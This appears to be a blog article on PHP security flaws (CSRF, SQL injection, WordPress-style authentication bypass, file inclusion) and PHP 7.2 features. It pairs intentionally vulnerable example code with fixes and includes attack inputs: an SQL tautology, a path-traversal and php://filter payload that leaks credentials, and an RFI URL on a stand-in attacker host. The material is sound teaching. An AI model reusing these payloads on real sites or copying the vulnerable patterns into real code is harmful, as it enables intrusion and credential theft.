According to recent reports, around 89% of websites are built on PHP, which makes it enormously popular worldwide. It is also free and requires no licensing fee, so anyone with some programming knowledge can use it. Its features and advantages could fill a page of their own, but none of that means PHP applications are free of vulnerabilities. Attackers and automated bots will try to exploit these weaknesses to gain access to your website, so the first step is to know what they are.
Some of the common PHP vulnerabilities include:
Cross-Site Request Forgery (CSRF) - The attacker crafts a link, or a hidden form on a site they control, and gets someone with privileged access (such as an administrator) to visit it. The victim's browser sends the forged request to your site with the victim's session cookie attached, so the application carries out the action with the administrator's privileges. A typical CSRF attack uses this to create a new "admin" user with a password the attacker already knows.
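The following is an added example, not code from the original article: a minimal admin "create user" handler written first without and then with CSRF protection (a per-session synchronizer token plus a POST-only rule). The field names, the `is_admin` session flag and the create-user step are illustrative assumptions.

```php
<?php
// Added example, not code from the original article: a minimal admin
// "create user" handler written without and then with CSRF protection.
// The field names, the is_admin session flag and the create-user step are
// illustrative assumptions.
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// Vulnerable: any request that arrives with the admin's session cookie is
// honoured. A page on a site the attacker controls can auto-submit this
// form (or, for a GET handler, simply link to it) and the victim's browser
// attaches the cookie by itself.
function create_user_vulnerable(array $params): string
{
    if (empty($_SESSION['is_admin'])) {
        return 'forbidden';
    }
    // A real handler would persist the account here.
    return 'created ' . $params['username'];
}

// Hardened: a per-session secret that the attacker's page cannot read
// (same-origin policy) must accompany every state-changing request.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time, so the token cannot be
    // recovered byte by byte through timing differences.
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

function create_user_hardened(string $method, array $params): string
{
    if (empty($_SESSION['is_admin'])) {
        return 'forbidden';
    }
    // State changes only via POST (a bare link can never trigger them) and
    // only when the token matches the one stored in this session.
    if ($method !== 'POST' || !csrf_check($params['csrf_token'] ?? null)) {
        return 'rejected: missing or invalid CSRF token';
    }
    return 'created ' . $params['username'];
}

// The legitimate admin form embeds the token as a hidden field.
function render_form(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/admin/create-user.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="username"> <input name="password" type="password">'
         . '<button>Create</button></form>';
}

// Walk-through with a simulated logged-in administrator session.
$_SESSION['is_admin'] = true;
echo create_user_vulnerable(['username' => 'evil']), PHP_EOL;            // forged request goes through
echo create_user_hardened('GET', ['username' => 'evil']), PHP_EOL;       // link-based attempt is refused
echo create_user_hardened('POST', ['username' => 'evil', 'csrf_token' => 'guess']), PHP_EOL;
echo create_user_hardened('POST', ['username' => 'ops', 'csrf_token' => csrf_token()]), PHP_EOL;
echo render_form(), PHP_EOL;
```

The token must be unpredictable (hence `random_bytes`) and tied to the session, never derived from data the attacker can see. Setting the session cookie with the SameSite attribute is a useful second layer, but it is not a replacement for the token check.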
SQL Injection (SQLi) - SQL injection occurs when an attacker's input is interpreted as part of a database query, so the database executes the attacker's instructions rather than treating the input as data. The blame usually falls on the PHP developer, who has concatenated visitor input straight into the query text instead of binding it as a parameter with a prepared statement; scanning the input for "malicious code" is not a reliable substitute.
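As an added example (not code from the original article), here is the same user lookup written the injectable way and the safe way, run against an in-memory SQLite database through PDO so it works offline. The table, its columns and the sample rows are constructed for the demonstration.

```php
<?php
// Added example, not code from the original article: the same user lookup
// written the injectable way and the safe way, run against an in-memory
// SQLite database (pdo_sqlite) so it works offline. The table, its columns
// and the sample rows are constructed for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, role TEXT NOT NULL)');
$db->exec("INSERT INTO users (username, role) VALUES ('alice', 'subscriber'), ('admin', 'administrator')");

// Vulnerable: the visitor's string is spliced into the SQL text, so it can
// change the statement's structure, not merely supply a value.
function find_user_vulnerable(PDO $db, string $username): array
{
    $sql = "SELECT id, username, role FROM users WHERE username = '" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: a prepared statement ships the query and the value separately.
// The value is never parsed as SQL, whatever it contains, so there is no
// "malicious code" to detect in the first place.
function find_user_safe(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT id, username, role FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the quoted literal and appends a
// tautology, turning the WHERE clause into  username = '' OR '1'='1'
$payload = "' OR '1'='1";

// The vulnerable query matches every row, the admin account included;
// the safe query matches nobody, because no user is literally named that.
echo 'vulnerable: ', count(find_user_vulnerable($db, $payload)), ' row(s)', PHP_EOL;
echo 'safe:       ', count(find_user_safe($db, $payload)), ' row(s)', PHP_EOL;
print_r(find_user_safe($db, 'alice'));
```

With MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to false so that the server, not the client driver, does the binding. Identifiers (table or column names) and `ORDER BY` directions cannot be bound as parameters; those need an allow-list of permitted values instead.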
Authentication Bypass - Developers sometimes believe they have validated that a visitor has the proper access level when they have not. A common case is WordPress's is_admin() function: many developers assume it tells them the current user is an administrator, when in fact it only reports that an admin-area page is being rendered, which any logged-in user can request. The right question is whether the user holds the capability (in WordPress, current_user_can('manage_options') or a more specific capability). The result of this mistake is that non-admin users gain access to features only admins should be able to use.
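As an added illustration (not code from the article or from WordPress itself), the following stand-alone model reproduces the is_admin() confusion with two assumed helpers: `is_admin_area()` answers the question WordPress's is_admin() actually answers (where is the request going), and `user_has_capability()` answers the one the developer meant to ask (who is making it). The roles, capabilities and URLs are constructed for the demonstration; in a real plugin the equivalent correct call is current_user_can() with the relevant capability.

```php
<?php
// Added example, not from the article or from WordPress: a minimal model of
// the is_admin() mistake. Roles, capabilities, paths and helper names are
// assumptions made for this demonstration.

const ROLE_CAPS = [
    'administrator' => ['read', 'manage_options', 'delete_users'],
    'subscriber'    => ['read'],
];

// Mirrors what WordPress's is_admin() actually tests: the location being
// rendered, not the person requesting it. strpos() is used instead of
// str_starts_with() to stay compatible with PHP 7.2.
function is_admin_area(string $path): bool
{
    return strpos($path, '/wp-admin/') === 0;
}

// The check the developer meant: does this user hold the capability?
function user_has_capability(array $user, string $capability): bool
{
    return in_array($capability, ROLE_CAPS[$user['role']] ?? [], true);
}

// Vulnerable: a subscriber who simply types the admin URL passes this test.
function delete_user_vulnerable(array $user, string $path, int $targetId): string
{
    if (!is_admin_area($path)) {
        return 'forbidden';
    }
    return "user $targetId deleted by {$user['name']}";
}

// Hardened: the decision depends only on the caller's capability, never on
// which page happens to be rendering.
function delete_user_hardened(array $user, string $path, int $targetId): string
{
    if (!user_has_capability($user, 'delete_users')) {
        return 'forbidden';
    }
    return "user $targetId deleted by {$user['name']}";
}

// Constructed users and request.
$subscriber = ['name' => 'mallory', 'role' => 'subscriber'];
$admin      = ['name' => 'root',    'role' => 'administrator'];
$request    = '/wp-admin/users.php?action=delete';

echo delete_user_vulnerable($subscriber, $request, 7), PHP_EOL;  // the bypass: a subscriber succeeds
echo delete_user_hardened($subscriber, $request, 7), PHP_EOL;    // refused
echo delete_user_hardened($admin, $request, 7), PHP_EOL;         // allowed
```

The same pattern applies outside WordPress: any check that looks at the URL, the referring page, a hidden form field or a client-side flag instead of the server-side identity of the caller is an authentication bypass waiting to happen.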
Remote and Local File Inclusion (RFI and LFI) - Both occur when a PHP application takes input such as a page name, a path or a URL and passes it to a function that loads a file, such as include or require. With RFI the input is a URL, so the attacker's own code is fetched and executed (this needs allow_url_include to be enabled, which it is not by default). With LFI the attacker steers the include to a file that is already on the server, for example using ../ path traversal to read wp-config.php and the database credentials it contains, or including a log file or upload into which they have planted PHP code.
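As an added example (not code from the original article), the block below shows the classic include-from-request-parameter bug next to an allow-list replacement, and demonstrates the traversal and php://filter source-disclosure tricks against a wp-config.php of its own. It creates its page files in a temporary directory so it runs offline; the file names, the `page` parameter and the directory layout are assumptions.

```php
<?php
// Added example, not code from the original article: the include-from-
// parameter bug beside an allow-list replacement. It builds its own page
// files in a temporary directory so it runs offline; the file names, the
// "page" parameter and the directory layout are assumptions.
$root = sys_get_temp_dir() . '/lfi-demo-' . bin2hex(random_bytes(4));
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/home.php",  '<?php echo "home page", PHP_EOL;');
file_put_contents("$root/pages/about.php", '<?php echo "about page", PHP_EOL;');
file_put_contents("$root/wp-config.php",   '<?php define("DB_PASSWORD", "hunter2");');
$cwd = getcwd();
chdir("$root/pages");

// Vulnerable: the visitor's parameter decides what gets included.
//   ?page=../wp-config                                   -> LFI by traversal
//   ?page=php://filter/convert.base64-encode/resource=../wp-config
//        -> the file's source is returned base64-encoded instead of executed
//   ?page=http://attacker.example/shell  (allow_url_include=On) -> RFI
function render_vulnerable(string $page): void
{
    include $page . '.php';
}

// Hardened: map the parameter onto a fixed set of files; visitor-supplied
// bytes never reach the include path at all.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function render_safe(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        echo 'no such page', PHP_EOL;
        return;
    }
    include PAGES[$page];
}

render_vulnerable('home');
render_vulnerable('../wp-config');       // wp-config.php executes inside this process
echo defined('DB_PASSWORD') ? 'traversal worked: wp-config.php was included' : 'not included', PHP_EOL;

ob_start();
render_vulnerable('php://filter/convert.base64-encode/resource=../wp-config');
$leaked = base64_decode(ob_get_clean());
echo 'source disclosed through php://filter: ', $leaked, PHP_EOL;   // credentials in the clear

render_safe('about');
render_safe('../wp-config');
render_safe('php://filter/convert.base64-encode/resource=home');

// Remove the temporary tree.
chdir($cwd);
foreach (glob("$root/pages/*.php") as $f) {
    unlink($f);
}
unlink("$root/wp-config.php");
rmdir("$root/pages");
rmdir($root);
```

Note that php://filter is a local wrapper, so the source-disclosure trick works even with allow_url_include off; only the allow-list (or an equivalent mapping to fixed paths) closes it. Keeping open_basedir set and leaving allow_url_include disabled reduces the damage but does not fix the code.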
As a PHP web developer you have many ways to defend against these vulnerabilities, for example: test code as soon as you write it, be consistent in your code and methods, front-end tests, unit tests, input sanitization handlers, database handler classes, use of a framework and, of course, upgrading to PHP 7.2.0.
As the second feature update to the PHP 7 series, the PHP development team has released 7.2.0. As expected, it brings a wide range of improvements and features, including conversion of numeric keys in object/array casts, the object type hint, a warning when counting non-countable values, and HashContext as an object. That is not all: the new version also improves the TLS constants to sane values, removes the Mcrypt extension and adds the new Sodium extension.
Released on November 30, 2017, the version offers several security features:
• The Argon2 algorithm for securely hashing passwords (PASSWORD_ARGON2I in password_hash()) addresses downsides of current algorithms: it is memory-hard, designed for the highest memory filling rate, so GPU and ASIC cracking rigs gain far less advantage over a CPU.
• The Libsodium cryptography library, for authenticated encryption, is now a core extension. The library also offers high-speed elliptic-curve cryptography.
• SSL/TLS (Secure Sockets Layer/Transport Layer Security) constants have been improved.
• The Mcrypt cryptography library extension has been removed. PHP's developers have said Mcrypt has inhibited the growth of the PHP language and is effectively "abandonware".
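As an added example (not code from the original article or from PHP's own documentation), the block below puts the two cryptographic additions to use: Argon2 password hashing through password_hash(), with the rehash-on-login step needed to migrate older bcrypt hashes, and libsodium authenticated encryption with XChaCha20-Poly1305, including a tamper check. The function names and sample values are assumptions; PASSWORD_ARGON2I is only defined when PHP was built with Argon2 support, so the code falls back to bcrypt otherwise.

```php
<?php
// Added example, not code from the original article: the PHP 7.2
// cryptographic additions in use. Function names and sample values are
// assumptions; PASSWORD_ARGON2I exists only on a build with Argon2 support.

// --- Passwords: Argon2i (PHP 7.2; Argon2id arrived in 7.3). memory_cost is
// in KiB and is what makes the hash memory-hard; raise it until one hash
// takes roughly 100 ms on your login servers.
const ARGON2_OPTIONS = ['memory_cost' => 1 << 16, 'time_cost' => 4, 'threads' => 2];
const BCRYPT_OPTIONS = ['cost' => 12];

function current_algo()
{
    return defined('PASSWORD_ARGON2I') ? PASSWORD_ARGON2I : PASSWORD_BCRYPT;
}

function current_options(): array
{
    return defined('PASSWORD_ARGON2I') ? ARGON2_OPTIONS : BCRYPT_OPTIONS;
}

function hash_password(string $password): string
{
    return password_hash($password, current_algo(), current_options());
}

// Verify, and report whether the stored hash (for example an old bcrypt one)
// should be replaced with the current algorithm on this successful login.
function check_password(string $password, string $stored): array
{
    $ok = password_verify($password, $stored);
    return [
        'ok'     => $ok,
        'rehash' => $ok && password_needs_rehash($stored, current_algo(), current_options()),
    ];
}

// --- Data: XChaCha20-Poly1305 AEAD from the sodium extension. The tag covers
// the ciphertext and the optional associated data, so tampering is detected
// rather than decrypting to garbage, which is the failure mode of the
// unauthenticated mcrypt-era CBC code this replaces.
function encrypt_message(string $plaintext, string $key, string $aad = ''): string
{
    $nonce = random_bytes(SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES); // 24 bytes, fresh per message
    return $nonce . sodium_crypto_aead_xchacha20poly1305_ietf_encrypt($plaintext, $aad, $nonce, $key);
}

function decrypt_message(string $blob, string $key, string $aad = ''): ?string
{
    $n = SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES;
    if (strlen($blob) < $n + SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_ABYTES) {
        return null;
    }
    $pt = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt(substr($blob, $n), $aad, substr($blob, 0, $n), $key);
    return $pt === false ? null : $pt;
}

// --- Walk-through with constructed inputs.
$hash = hash_password('correct horse battery staple');
echo $hash, PHP_EOL;                                   // begins with $argon2i$ on an Argon2 build
var_dump(check_password('correct horse battery staple', $hash));
var_dump(check_password('wrong', $hash)['ok']);
$legacy = password_hash('correct horse battery staple', PASSWORD_BCRYPT, ['cost' => 10]);
var_dump(check_password('correct horse battery staple', $legacy)['rehash']);   // migration needed

$key  = sodium_crypto_aead_xchacha20poly1305_ietf_keygen();
$blob = encrypt_message('account balance: 100', $key, 'user=42');
var_dump(decrypt_message($blob, $key, 'user=42'));
$tampered = $blob;
$last = strlen($tampered) - 1;
$tampered[$last] = chr(ord($tampered[$last]) ^ 1);     // flip one bit of the ciphertext/tag
var_dump(decrypt_message($tampered, $key, 'user=42'));  // authentication fails, nothing is returned
var_dump(decrypt_message($blob, $key, 'user=43'));      // associated data mismatch fails the same way
sodium_memzero($key);

// The removed extension: code that still calls mcrypt_* fatals on 7.2.
if (!extension_loaded('mcrypt')) {
    echo 'mcrypt is gone; re-encrypt legacy data with sodium', PHP_EOL;
}
```

Keep the nonce prefixed to each ciphertext rather than stored separately, and never reuse a nonce with the same key; the 24-byte XChaCha20 nonce is large enough that random generation is safe. Hashes produced by Argon2 carry their own parameters, so memory_cost and time_cost can be raised later without breaking existing logins, with password_needs_rehash() driving the migration as shown.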
Other improved programming features include:
Conversion of numeric keys in object/array casts addresses an issue with the Zend Engine, which powers PHP 7. The engine has had cases where array hash tables can contain numeric strings while object hash tables can have integer keys. In such cases, PHP code can’t find the keys. With the fix in PHP 7.2, keys of arrays or object hash tables are converted as appropriate, so numeric string property names in objects become integer array keys and vice versa, solving the issue of inaccessible properties.
Object type hints fix a gap in which a developer could not declare that a function must be passed an object as a parameter, or that a function returns an object. The fix adds object as a parameter type and as a return type: any object is accepted, and anything else is rejected with a TypeError.
HashContext as Object migrates the hash extension to use an object for hash contexts instead of a resource.
A new warning is emitted when calling count() with a parameter that is a scalar, null, or an object that does not implement the Countable interface.
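As an added example (not code from the original article), the following script exercises the four engine and library changes just described on PHP 7.2: the cast key conversion, the object type hint, the HashContext object and the count() warning, with a small guard function that makes the counting intent explicit. The sample values are constructed.

```php
<?php
// Added example, not code from the original article: the four PHP 7.2
// engine and library changes described above, exercised. Sample values
// are constructed; nothing here is specific to any project.

// 1. Numeric keys in array/object casts. Before 7.2 the integer key 1 was
//    carried into the object unchanged, where property access (string
//    names) could not reach it, and a string property "2" came back as a
//    string array key that $arr[2] could not find. 7.2 converts both ways.
function cast_round_trip(): array
{
    $obj = (object) [1 => 'one'];     // int key becomes property "1"
    $o = new stdClass();
    $o->{'2'} = 'two';                // string property name
    $arr = (array) $o;                // becomes int key 2
    return ['property_reachable' => isset($obj->{'1'}), 'key_reachable' => isset($arr[2])];
}
var_dump(cast_round_trip());

// 2. object as parameter and return type: any object passes, anything else
//    is a TypeError at the call site.
function summarise(object $o): object
{
    return (object) ['class' => get_class($o), 'props' => count(get_object_vars($o))];
}
var_dump(summarise(new DateTime('2017-11-30')));
try {
    summarise('not an object');
} catch (TypeError $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// 3. HashContext is an object. Streaming hashes work as before, but the
//    context can now be type-hinted and is no longer a "resource".
function streamed_sha256(array $chunks): string
{
    $ctx = hash_init('sha256');
    foreach ($chunks as $chunk) {
        hash_update($ctx, $chunk);
    }
    return hash_final($ctx);
}
var_dump(hash_init('sha256') instanceof HashContext);
var_dump(streamed_sha256(['hel', 'lo']) === hash('sha256', 'hello'));

// 4. count() on a non-countable warns in 7.2 (and throws TypeError from
//    PHP 8). Make the intent explicit instead of relying on count(null)
//    quietly being 0.
function safe_count($value): int
{
    if (is_array($value) || $value instanceof Countable) {
        return count($value);
    }
    return 0;
}
set_error_handler(function (int $errno, string $errstr): bool {
    echo 'warning caught: ', $errstr, PHP_EOL;
    return true;
});
try {
    count(null);              // 7.2: warning; 8.x: TypeError
} catch (TypeError $e) {
    echo 'TypeError on PHP 8: ', $e->getMessage(), PHP_EOL;
}
restore_error_handler();
echo safe_count(null), ' ', safe_count([1, 2, 3]), ' ', safe_count(new ArrayObject([1])), PHP_EOL;
```

The count() warning is worth treating as an error in a test run (set_error_handler that throws, or error_reporting(E_ALL) with display on): every place it fires is a spot where code silently assumed an array and may misbehave on unexpected input.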
So that's all for now! Keep watching this space for more!